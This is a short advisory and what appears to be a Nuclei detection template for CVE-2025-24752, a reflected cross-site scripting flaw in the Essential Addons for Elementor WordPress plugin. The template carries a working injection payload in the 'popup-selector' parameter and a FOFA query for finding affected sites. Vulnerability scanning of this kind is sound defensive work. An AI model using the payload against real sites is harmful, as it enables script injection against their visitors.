A Cross-Site Scripting (XSS) vulnerability exists in Essential Addons for Elementor Plugin for WordPress versions prior to 6.0.15. The vulnerability allows an attacker to inject malicious JavaScript payloads into web pages by exploiting insufficient input sanitization and output escaping in specific plugin components.
PoC代码[已公开]
id: CVE-2025-24752
info:
name: Essential Addons for Elementor < 6.0.15 - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
A Cross-Site Scripting (XSS) vulnerability exists in Essential Addons for Elementor Plugin for WordPress versions prior to 6.0.15. The vulnerability allows an attacker to inject malicious JavaScript payloads into web pages by exploiting insufficient input sanitization and output escaping in specific plugin components.
reference:
- https://www.tenable.com/plugins/was/114609
- https://patchstack.com/articles/reflected-xss-patched-in-essential-addons-for-elementor-affecting-2-million-sites/
- https://github.com/Sachinart/essential-addons-for-elementor-xss-poc/blob/main/poc.py
classification:
epss-score: 0.03198
epss-percentile: 0.86471
metadata:
verified: true
max-request: 1
fofa-query: body="/wp-content/plugins/essential-addons-for-elementor-lite"
tags: cve,cve2025,xss,essential,elementor-lite,vkev,vuln
variables:
random_int: '{{rand_int(1,1000)}}'
headless:
- steps:
- args:
url: '{{BaseURL}}/?popup-selector=<img_src%3Dx_onerror%3Dalert%28%27{{random_int}}n%27%29>&eael-lostpassword=1'
action: navigate
- action: waitdialog
name: subdomain_object_dom
matchers-condition: and
matchers:
- type: dsl
dsl:
- subdomain_object_dom == true
- type: word
part: body
words:
- "{{random_int}}"
case-insensitive: true
# digest: 480a0045304302204431f87b015c1d4d9ef685b60b13240b3359d43e09a0a5fc5fff50bb3d9ac4f7021f39138551ffbe1133b773be4a05583ea8235ea3682a82ff3278f4903a60ba7d:922c64590222798bb761d5b6d8e72950